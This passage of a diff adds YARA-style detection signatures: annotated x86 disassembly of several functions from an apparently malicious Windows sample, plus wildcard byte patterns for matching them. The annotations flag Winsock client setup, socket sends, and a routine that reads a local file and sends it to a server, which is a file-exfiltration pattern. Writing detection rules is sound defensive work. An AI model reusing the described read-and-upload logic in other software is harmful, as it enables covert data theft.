ecx,3 + .text:0x00401b5b f3a4 rep: movsb + .text:0x00401b5d 8b7d10 mov edi,dword [ebp + 16] + .text:0x00401b60 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x00401b66 83c9ff or ecx,0xffffffff + .text:0x00401b69 33c0 xor eax,eax + .text:0x00401b6b f2ae repnz: scasb + .text:0x00401b6d f7d1 not ecx + .text:0x00401b6f 2bf9 sub edi,ecx + .text:0x00401b71 8bf7 mov esi,edi + .text:0x00401b73 8bd9 mov ebx,ecx + .text:0x00401b75 8bfa mov edi,edx + .text:0x00401b77 83c9ff or ecx,0xffffffff + .text:0x00401b7a 33c0 xor eax,eax + .text:0x00401b7c f2ae repnz: scasb + .text:0x00401b7e 83c7ff add edi,0xffffffff + .text:0x00401b81 8bcb mov ecx,ebx + .text:0x00401b83 c1e902 shr ecx,2 + .text:0x00401b86 f3a5 rep: movsd + .text:0x00401b88 8bcb mov ecx,ebx + .text:0x00401b8a 83e103 and ecx,3 + .text:0x00401b8d f3a4 rep: movsb + .text:0x00401b8f bf70c04000 mov edi,0x0040c070 + .text:0x00401b94 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x00401b9a 83c9ff or ecx,0xffffffff + .text:0x00401b9d 33c0 xor eax,eax + .text:0x00401b9f f2ae repnz: scasb + .text:0x00401ba1 f7d1 not ecx + .text:0x00401ba3 2bf9 sub edi,ecx + .text:0x00401ba5 8bf7 mov esi,edi + .text:0x00401ba7 8bd9 mov ebx,ecx + .text:0x00401ba9 8bfa mov edi,edx + .text:0x00401bab 83c9ff or ecx,0xffffffff + .text:0x00401bae 33c0 xor eax,eax + .text:0x00401bb0 f2ae repnz: scasb + .text:0x00401bb2 83c7ff add edi,0xffffffff + .text:0x00401bb5 8bcb mov ecx,ebx + .text:0x00401bb7 c1e902 shr ecx,2 + .text:0x00401bba f3a5 rep: movsd + .text:0x00401bbc 8bcb mov ecx,ebx + .text:0x00401bbe 83e103 and ecx,3 + .text:0x00401bc1 f3a4 rep: movsb + .text:0x00401bc3 6a00 push 0 + .text:0x00401bc5 8dbdfcfbffff lea edi,dword [ebp - 1028] + .text:0x00401bcb 83c9ff or ecx,0xffffffff + .text:0x00401bce 33c0 xor eax,eax + .text:0x00401bd0 f2ae repnz: scasb + .text:0x00401bd2 f7d1 not ecx + .text:0x00401bd4 83c1ff add ecx,0xffffffff + .text:0x00401bd7 51 push ecx + .text:0x00401bd8 8d85fcfbffff lea eax,dword [ebp - 1028] + .text:0x00401bde 50 push eax + .text:0x00401bdf 8b8df4fbffff mov ecx,dword [ebp - 1036] + .text:0x00401be5 51 push ecx + .text:0x00401be6 ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local1032,0xffffffff,0) + .text:0x00401bec 8985f0f9ffff mov dword [ebp - 1552],eax + .text:0x00401bf2 83bdf0f9ffffff cmp dword [ebp - 1552],0xffffffff + .text:0x00401bf9 751d jnz 0x00401c18 + .text:0x00401bfb 8b95f4fbffff mov edx,dword [ebp - 1036] + .text:0x00401c01 52 push edx + .text:0x00401c02 ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0) + .text:0x00401c08 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401c0e b801000000 mov eax,1 + .text:0x00401c13 e9e4000000 jmp 0x00401cfc + .text:0x00401c18 loc_00401c18: [2 XREFS] + .text:0x00401c18 6a00 push 0 + .text:0x00401c1a 6800020000 push 512 + .text:0x00401c1f 8d85f4f9ffff lea eax,dword [ebp - 1548] + .text:0x00401c25 50 push eax + .text:0x00401c26 8b8df4fbffff mov ecx,dword [ebp - 1036] + .text:0x00401c2c 51 push ecx + .text:0x00401c2d ff1560b14000 call dword [0x0040b160] ;ws2_32.recv(0,local1552,512) + .text:0x00401c33 8945fc mov dword [ebp - 4],eax + .text:0x00401c36 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401c3a 7e71 jle 0x00401cad + .text:0x00401c3c 8b95f8fbffff mov edx,dword [ebp - 1032] + .text:0x00401c42 0355fc add edx,dword [ebp - 4] + .text:0x00401c45 8b4518 mov eax,dword [ebp + 24] + .text:0x00401c48 3b10 cmp edx,dword [eax] + .text:0x00401c4a 7619 jbe 0x00401c65 + .text:0x00401c4c 8d8df4fbffff lea ecx,dword [ebp - 1036] + .text:0x00401c52 51 push ecx + .text:0x00401c53 e8e8faffff call 0x00401740 ;sub_00401740(local1040) + .text:0x00401c58 83c404 add esp,4 + .text:0x00401c5b b801000000 mov eax,1 + .text:0x00401c60 e997000000 jmp 0x00401cfc + .text:0x00401c65 loc_00401c65: [1 XREFS] + .text:0x00401c65 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00401c68 8db5f4f9ffff lea esi,dword [ebp - 1548] + .text:0x00401c6e 8b7d14 mov edi,dword [ebp + 20] + .text:0x00401c71 03bdf8fbffff add edi,dword [ebp - 1032] + .text:0x00401c77 8bd1 mov edx,ecx + .text:0x00401c79 c1e902 shr ecx,2 + .text:0x00401c7c f3a5 rep: movsd + .text:0x00401c7e 8bca mov ecx,edx + .text:0x00401c80 83e103 and ecx,3 + .text:0x00401c83 f3a4 rep: movsb + .text:0x00401c85 8b85f8fbffff mov eax,dword [ebp - 1032] + .text:0x00401c8b 0345fc add eax,dword [ebp - 4] + .text:0x00401c8e 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x00401c94 6868c04000 push 0x0040c068 + .text:0x00401c99 8b4d14 mov ecx,dword [ebp + 20] + .text:0x00401c9c 51 push ecx + .text:0x00401c9d e8be130000 call 0x00403060 ;_strstr(arg3,0x0040c068) + .text:0x00401ca2 83c408 add esp,8 + .text:0x00401ca5 85c0 test eax,eax + .text:0x00401ca7 7402 jz 0x00401cab + .text:0x00401ca9 eb2a jmp 0x00401cd5 + .text:0x00401cab loc_00401cab: [1 XREFS] + .text:0x00401cab eb1e jmp 0x00401ccb + .text:0x00401cad loc_00401cad: [1 XREFS] + .text:0x00401cad 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401cb1 7502 jnz 0x00401cb5 + .text:0x00401cb3 eb16 jmp 0x00401ccb + .text:0x00401cb5 loc_00401cb5: [1 XREFS] + .text:0x00401cb5 8d95f4fbffff lea edx,dword [ebp - 1036] + .text:0x00401cbb 52 push edx + .text:0x00401cbc e87ffaffff call 0x00401740 ;sub_00401740(local1040) + .text:0x00401cc1 83c404 add esp,4 + .text:0x00401cc4 b801000000 mov eax,1 + .text:0x00401cc9 eb31 jmp 0x00401cfc + .text:0x00401ccb loc_00401ccb: [2 XREFS] + .text:0x00401ccb 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401ccf 0f8f43ffffff jg 0x00401c18 + .text:0x00401cd5 loc_00401cd5: [1 XREFS] + .text:0x00401cd5 8d85f4fbffff lea eax,dword [ebp - 1036] + .text:0x00401cdb 50 push eax + .text:0x00401cdc e85ffaffff call 0x00401740 ;sub_00401740(local1040) + .text:0x00401ce1 83c404 add esp,4 + .text:0x00401ce4 85c0 test eax,eax + .text:0x00401ce6 7407 jz 0x00401cef + .text:0x00401ce8 b801000000 mov eax,1 + .text:0x00401ced eb0d jmp 0x00401cfc + .text:0x00401cef loc_00401cef: [1 XREFS] + .text:0x00401cef 8b4d18 mov ecx,dword [ebp + 24] + .text:0x00401cf2 8b95f8fbffff mov edx,dword [ebp - 1032] + .text:0x00401cf8 8911 mov dword [ecx],edx + .text:0x00401cfa 33c0 xor eax,eax + .text:0x00401cfc loc_00401cfc: [5 XREFS] + .text:0x00401cfc 5f pop edi + .text:0x00401cfd 5e pop esi + .text:0x00401cfe 5b pop ebx + .text:0x00401cff 8be5 mov esp,ebp + .text:0x00401d01 5d pop ebp + .text:0x00401d02 c3 ret + */ + $c49 = { 55 8B EC 81 EC 10 06 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 8B 45 ?? 50 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 80 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 70 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 8D BD ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 00 02 00 00 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 7E ?? 8B 95 ?? ?? ?? ?? 03 55 ?? 8B 45 ?? 3B 10 76 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 4D ?? 8D B5 ?? ?? ?? ?? 8B 7D ?? 03 BD ?? ?? ?? ?? 8B D1 C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 8B 85 ?? ?? ?? ?? 03 45 ?? 89 85 ?? ?? ?? ?? 68 68 C0 40 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? EB ?? EB ?? 83 7D ?? 00 75 ?? EB ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 83 7D ?? 00 0F 8F ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 8B 4D ?? 8B 95 ?? ?? ?? ?? 89 11 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401790@b94af4a4d4af6eac81fc135abda1c40c with 2 features: + - send data + - send data on socket + .text:0x00401790 + .text:0x00401790 FUNC: int cdecl sub_00401790( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401790 + .text:0x00401790 Stack Variables: (offset from initial top of stack) + .text:0x00401790 12: int arg2 + .text:0x00401790 8: int arg1 + .text:0x00401790 4: int arg0 + .text:0x00401790 -8: int local8 + .text:0x00401790 -12: int local12 + .text:0x00401790 -524: int local524 + .text:0x00401790 -528: int local528 + .text:0x00401790 -532: int local532 + .text:0x00401790 + .text:0x00401790 55 push ebp + .text:0x00401791 8bec mov ebp,esp + .text:0x00401793 81ec10020000 sub esp,528 + .text:0x00401799 c745fc00000000 mov dword [ebp - 4],0 + .text:0x004017a0 8b450c mov eax,dword [ebp + 12] + .text:0x004017a3 50 push eax + .text:0x004017a4 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004017a7 51 push ecx + .text:0x004017a8 8d55fc lea edx,dword [ebp - 4] + .text:0x004017ab 52 push edx + .text:0x004017ac e88ffeffff call 0x00401640 ;sub_00401640(local8,arg0,arg1) + .text:0x004017b1 83c40c add esp,12 + .text:0x004017b4 85c0 test eax,eax + .text:0x004017b6 740a jz 0x004017c2 + .text:0x004017b8 b801000000 mov eax,1 + .text:0x004017bd e9a0000000 jmp 0x00401862 + .text:0x004017c2 loc_004017c2: [2 XREFS] + .text:0x004017c2 c785f4fdffff0000 mov dword [ebp - 524],0 + .text:0x004017cc 8b4510 mov eax,dword [ebp + 16] + .text:0x004017cf 50 push eax + .text:0x004017d0 6800020000 push 512 + .text:0x004017d5 6a01 push 1 + .text:0x004017d7 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x004017dd 51 push ecx + .text:0x004017de e892170000 call 0x00402f75 ;?(local524,1,512,arg2) + .text:0x004017e3 83c410 add esp,16 + .text:0x004017e6 8945f8 mov dword [ebp - 8],eax + .text:0x004017e9 loc_004017e9: [1 XREFS] + .text:0x004017e9 6a00 push 0 + .text:0x004017eb 8b55f8 mov edx,dword [ebp - 8] + .text:0x004017ee 52 push edx + .text:0x004017ef 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x004017f5 50 push eax + .text:0x004017f6 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004017f9 51 push ecx + .text:0x004017fa ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local524,sub_00402f75(local524,1,512,arg2),0) + .text:0x00401800 8985f0fdffff mov dword [ebp - 528],eax + .text:0x00401806 83bdf0fdffffff cmp dword [ebp - 528],0xffffffff + .text:0x0040180d 7513 jnz 0x00401822 + .text:0x0040180f 8d55fc lea edx,dword [ebp - 4] + .text:0x00401812 52 push edx + .text:0x00401813 e828ffffff call 0x00401740 ;sub_00401740(local8) + .text:0x00401818 83c404 add esp,4 + .text:0x0040181b b801000000 mov eax,1 + .text:0x00401820 eb40 jmp 0x00401862 + .text:0x00401822 loc_00401822: [1 XREFS] + .text:0x00401822 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401828 0385f0fdffff add eax,dword [ebp - 528] + .text:0x0040182e 8985f4fdffff mov dword [ebp - 524],eax + .text:0x00401834 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x0040183a 3b4df8 cmp ecx,dword [ebp - 8] + .text:0x0040183d 72aa jc 0x004017e9 + .text:0x0040183f 837df800 cmp dword [ebp - 8],0 + .text:0x00401843 0f8779ffffff ja 0x004017c2 + .text:0x00401849 8d55fc lea edx,dword [ebp - 4] + .text:0x0040184c 52 push edx + .text:0x0040184d e8eefeffff call 0x00401740 ;sub_00401740(local8) + .text:0x00401852 83c404 add esp,4 + .text:0x00401855 85c0 test eax,eax + .text:0x00401857 7407 jz 0x00401860 + .text:0x00401859 b801000000 mov eax,1 + .text:0x0040185e eb02 jmp 0x00401862 + .text:0x00401860 loc_00401860: [1 XREFS] + .text:0x00401860 33c0 xor eax,eax + .text:0x00401862 loc_00401862: [3 XREFS] + .text:0x00401862 8be5 mov esp,ebp + .text:0x00401864 5d pop ebp + .text:0x00401865 c3 ret + */ + $c50 = { 55 8B EC 81 EC 10 02 00 00 C7 45 ?? 00 00 00 00 8B 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 8B 45 ?? 50 68 00 02 00 00 6A 01 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 10 89 45 ?? 6A 00 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 72 ?? 83 7D ?? 00 0F 87 ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 8B E5 5D C3 } + /* +function at 0x00401870@b94af4a4d4af6eac81fc135abda1c40c with 4 features: + - read and send data from client to server + - read file on Windows + - send data + - send data on socket + .text:0x00401870 + .text:0x00401870 FUNC: int cdecl sub_00401870( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401870 + .text:0x00401870 Stack Variables: (offset from initial top of stack) + .text:0x00401870 12: int arg2 + .text:0x00401870 8: int arg1 + .text:0x00401870 4: int arg0 + .text:0x00401870 -8: int local8 + .text:0x00401870 -12: int local12 + .text:0x00401870 -524: int local524 + .text:0x00401870 -528: int local528 + .text:0x00401870 -532: int local532 + .text:0x00401870 -536: int local536 + .text:0x00401870 + .text:0x00401870 55 push ebp + .text:0x00401871 8bec mov ebp,esp + .text:0x00401873 81ec14020000 sub esp,532 + .text:0x00401879 c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401880 8b450c mov eax,dword [ebp + 12] + .text:0x00401883 50 push eax + .text:0x00401884 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401887 51 push ecx + .text:0x00401888 8d55fc lea edx,dword [ebp - 4] + .text:0x0040188b 52 push edx + .text:0x0040188c e8affdffff call 0x00401640 ;sub_00401640(local8,arg0,arg1) + .text:0x00401891 83c40c add esp,12 + .text:0x00401894 85c0 test eax,eax + .text:0x00401896 740a jz 0x004018a2 + .text:0x00401898 b801000000 mov eax,1 + .text:0x0040189d e936010000 jmp 0x004019d8 + .text:0x004018a2 loc_004018a2: [1 XREFS] + .text:0x004018a2 6a00 push 0 + .text:0x004018a4 6880000000 push 128 + .text:0x004018a9 6a03 push 3 + .text:0x004018ab 6a00 push 0 + .text:0x004018ad 6a01 push 1 + .text:0x004018af 6800000080 push 0x80000000 + .text:0x004018b4 8b4510 mov eax,dword [ebp + 16] + .text:0x004018b7 50 push eax + .text:0x004018b8 ff1554b04000 call dword [0x0040b054] ;kernel32.CreateFileA(arg2,0x80000000,1,0,3,128,0) + .text:0x004018be 8985f4fdffff mov dword [ebp - 524],eax + .text:0x004018c4 83bdf4fdffffff cmp dword [ebp - 524],0xffffffff + .text:0x004018cb 7516 jnz 0x004018e3 + .text:0x004018cd 8d4dfc lea ecx,dword [ebp - 4] + .text:0x004018d0 51 push ecx + .text:0x004018d1 e86afeffff call 0x00401740 ;sub_00401740(local8) + .text:0x004018d6 83c404 add esp,4 + .text:0x004018d9 b801000000 mov eax,1 + .text:0x004018de e9f5000000 jmp 0x004019d8 + .text:0x004018e3 loc_004018e3: [2 XREFS] + .text:0x004018e3 c785f0fdffff0000 mov dword [ebp - 528],0 + .text:0x004018ed 6a00 push 0 + .text:0x004018ef 8d55f8 lea edx,dword [ebp - 8] + .text:0x004018f2 52 push edx + .text:0x004018f3 6800020000 push 512 + .text:0x004018f8 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x004018fe 50 push eax + .text:0x004018ff 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x00401905 51 push ecx + .text:0x00401906 ff1548b04000 call dword [0x0040b048] ;kernel32.ReadFile(kernel32.CreateFileA(arg2,0x80000000,1,0,3,128,0),local524,512,local12,0) + .text:0x0040190c 85c0 test eax,eax + .text:0x0040190e 7535 jnz 0x00401945 + .text:0x00401910 ff154cb04000 call dword [0x0040b04c] ;ntdll.RtlGetLastWin32Error() + .text:0x00401916 83f826 cmp eax,38 + .text:0x00401919 7423 jz 0x0040193e + .text:0x0040191b 8d55fc lea edx,dword [ebp - 4] + .text:0x0040191e 52 push edx + .text:0x0040191f e81cfeffff call 0x00401740 ;sub_00401740(local8) + .text:0x00401924 83c404 add esp,4 + .text:0x00401927 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x0040192d 50 push eax + .text:0x0040192e ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x004018b8>) + .text:0x00401934 b801000000 mov eax,1 + .text:0x00401939 e99a000000 jmp 0x004019d8 + .text:0x0040193e loc_0040193e: [1 XREFS] + .text:0x0040193e c745f800000000 mov dword [ebp - 8],0 + .text:0x00401945 loc_00401945: [2 XREFS] + .text:0x00401945 6a00 push 0 + .text:0x00401947 8b4df8 mov ecx,dword [ebp - 8] + .text:0x0040194a 51 push ecx + .text:0x0040194b 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401951 52 push edx + .text:0x00401952 8b45fc mov eax,dword [ebp - 4] + .text:0x00401955 50 push eax + .text:0x00401956 ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local524,0xfefefefe,0) + .text:0x0040195c 8985ecfdffff mov dword [ebp - 532],eax + .text:0x00401962 83bdecfdffffff cmp dword [ebp - 532],0xffffffff + .text:0x00401969 7520 jnz 0x0040198b + .text:0x0040196b 8d4dfc lea ecx,dword [ebp - 4] + .text:0x0040196e 51 push ecx + .text:0x0040196f e8ccfdffff call 0x00401740 ;sub_00401740(local8) + .text:0x00401974 83c404 add esp,4 + .text:0x00401977 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x0040197d 52 push edx + .text:0x0040197e ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x004018b8>) + .text:0x00401984 b801000000 mov eax,1 + .text:0x00401989 eb4d jmp 0x004019d8 + .text:0x0040198b loc_0040198b: [1 XREFS] + .text:0x0040198b 8b85f0fdffff mov eax,dword [ebp - 528] + .text:0x00401991 0385ecfdffff add eax,dword [ebp - 532] + .text:0x00401997 8985f0fdffff mov dword [ebp - 528],eax + .text:0x0040199d 8b8df0fdffff mov ecx,dword [ebp - 528] + .text:0x004019a3 3b4df8 cmp ecx,dword [ebp - 8] + .text:0x004019a6 729d jc 0x00401945 + .text:0x004019a8 837df800 cmp dword [ebp - 8],0 + .text:0x004019ac 0f8731ffffff ja 0x004018e3 + .text:0x004019b2 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x004019b8 52 push edx + .text:0x004019b9 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x004018b8>) + .text:0x004019bf 8d45fc lea eax,dword [ebp - 4] + .text:0x004019c2 50 push eax + .text:0x004019c3 e878fdffff call 0x00401740 ;sub_00401740(local8) + .text:0x004019c8 83c404 add esp,4 + .text:0x004019cb 85c0 test eax,eax + .text:0x004019cd 7407 jz 0x004019d6 + .text:0x004019cf b801000000 mov eax,1 + .text:0x004019d4 eb02 jmp 0x004019d8 + .text:0x004019d6 loc_004019d6: [1 XREFS] + .text:0x004019d6 33c0 xor eax,eax + .text:0x004019d8 loc_004019d8: [5 XREFS] + .text:0x004019d8 8be5 mov esp,ebp + .text:0x004019da 5d pop ebp + .text:0x004019db c3 ret + */ + $c51 = { 55 8B EC 81 EC 14 02 00 00 C7 45 ?? 00 00 00 00 8B 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 6A 00 8D 55 ?? 52 68 00 02 00 00 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 83 F8 26 74 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 6A 00 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 72 ?? 83 7D ?? 00 0F 87 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 8B E5 5D C3 } + /* +function at 0x00401640@b94af4a4d4af6eac81fc135abda1c40c with 4 features: + - act as TCP client + - connect TCP socket + - initialize Winsock library + - resolve DNS + .text:0x00401640 + .text:0x00401640 FUNC: int cdecl sub_00401640( int arg0, int arg1, int arg2, ) [8 XREFS] + .text:0x00401640 + .text:0x00401640 Stack Variables: (offset from initial top of stack) + .text:0x00401640 12: int arg2 + .text:0x00401640 8: int arg1 + .text:0x00401640 4: int arg0 + .text:0x00401640 -404: int local404 + .text:0x00401640 -408: int local408 + .text:0x00401640 -420: int local420 + .text:0x00401640 -422: int local422 + .text:0x00401640 -424: int local424 + .text:0x00401640 + .text:0x00401640 55 push ebp + .text:0x00401641 8bec mov ebp,esp + .text:0x00401643 81eca4010000 sub esp,420 + .text:0x00401649 8b4508 mov eax,dword [ebp + 8] + .text:0x0040164c c700ffffffff mov dword [eax],0xffffffff + .text:0x00401652 8d8d70feffff lea ecx,dword [ebp - 400] + .text:0x00401658 51 push ecx + .text:0x00401659 6802020000 push 514 + .text:0x0040165e ff1544b14000 call dword [0x0040b144] ;ws2_32.WSAStartup(514,local404) + .text:0x00401664 85c0 test eax,eax + .text:0x00401666 740a jz 0x00401672 + .text:0x00401668 b801000000 mov eax,1 + .text:0x0040166d e9bb000000 jmp 0x0040172d + .text:0x00401672 loc_00401672: [1 XREFS] + .text:0x00401672 8b550c mov edx,dword [ebp + 12] + .text:0x00401675 52 push edx + .text:0x00401676 ff1548b14000 call dword [0x0040b148] ;ws2_32.gethostbyname(arg1) + .text:0x0040167c 89856cfeffff mov dword [ebp - 404],eax + .text:0x00401682 83bd6cfeffff00 cmp dword [ebp - 404],0 + .text:0x00401689 7510 jnz 0x0040169b + .text:0x0040168b ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401691 b801000000 mov eax,1 + .text:0x00401696 e992000000 jmp 0x0040172d + .text:0x0040169b loc_0040169b: [1 XREFS] + .text:0x0040169b 6a06 push 6 + .text:0x0040169d 6a01 push 1 + .text:0x0040169f 6a02 push 2 + .text:0x004016a1 ff1550b14000 call dword [0x0040b150] ;ws2_32.socket(2,1,6) + .text:0x004016a7 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004016aa 8901 mov dword [ecx],eax + .text:0x004016ac 8b5508 mov edx,dword [ebp + 8] + .text:0x004016af 833aff cmp dword [edx],0xffffffff + .text:0x004016b2 750d jnz 0x004016c1 + .text:0x004016b4 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x004016ba b801000000 mov eax,1 + .text:0x004016bf eb6c jmp 0x0040172d + .text:0x004016c1 loc_004016c1: [1 XREFS] + .text:0x004016c1 66c7855cfeffff02 mov word [ebp - 420],2 + .text:0x004016ca 8b856cfeffff mov eax,dword [ebp - 404] + .text:0x004016d0 8b480c mov ecx,dword [eax + 12] + .text:0x004016d3 8b11 mov edx,dword [ecx] + .text:0x004016d5 8b02 mov eax,dword [edx] + .text:0x004016d7 898560feffff mov dword [ebp - 416],eax + .text:0x004016dd 668b4d10 mov cx,word [ebp + 16] + .text:0x004016e1 51 push ecx + .text:0x004016e2 ff1554b14000 call dword [0x0040b154] ;ws2_32.htons(0x6161500f) + .text:0x004016e8 6689855efeffff mov word [ebp - 418],ax + .text:0x004016ef 6a10 push 16 + .text:0x004016f1 8d955cfeffff lea edx,dword [ebp - 420] + .text:0x004016f7 52 push edx + .text:0x004016f8 8b4508 mov eax,dword [ebp + 8] + .text:0x004016fb 8b08 mov ecx,dword [eax] + .text:0x004016fd 51 push ecx + .text:0x004016fe ff1558b14000 call dword [0x0040b158] ;ws2_32.connect(0x61616161,local424,16) + .text:0x00401704 83f8ff cmp eax,0xffffffff + .text:0x00401707 7522 jnz 0x0040172b + .text:0x00401709 8b5508 mov edx,dword [ebp + 8] + .text:0x0040170c 8b02 mov eax,dword [edx] + .text:0x0040170e 50 push eax + .text:0x0040170f ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0x61616161) + .text:0x00401715 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401718 c701ffffffff mov dword [ecx],0xffffffff + .text:0x0040171e ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401724 b801000000 mov eax,1 + .text:0x00401729 eb02 jmp 0x0040172d + .text:0x0040172b loc_0040172b: [1 XREFS] + .text:0x0040172b 33c0 xor eax,eax + .text:0x0040172d loc_0040172d: [4 XREFS] + .text:0x0040172d 8be5 mov esp,ebp + .text:0x0040172f 5d pop ebp + .text:0x00401730 c3 ret + */ + $c52 = { 55 8B EC 81 EC A4 01 00 00 8B 45 ?? C7 00 FF FF FF FF 8D 8D ?? ?? ?? ?? 51 68 02 02 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ?? 83 3A FF 75 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 66 C7 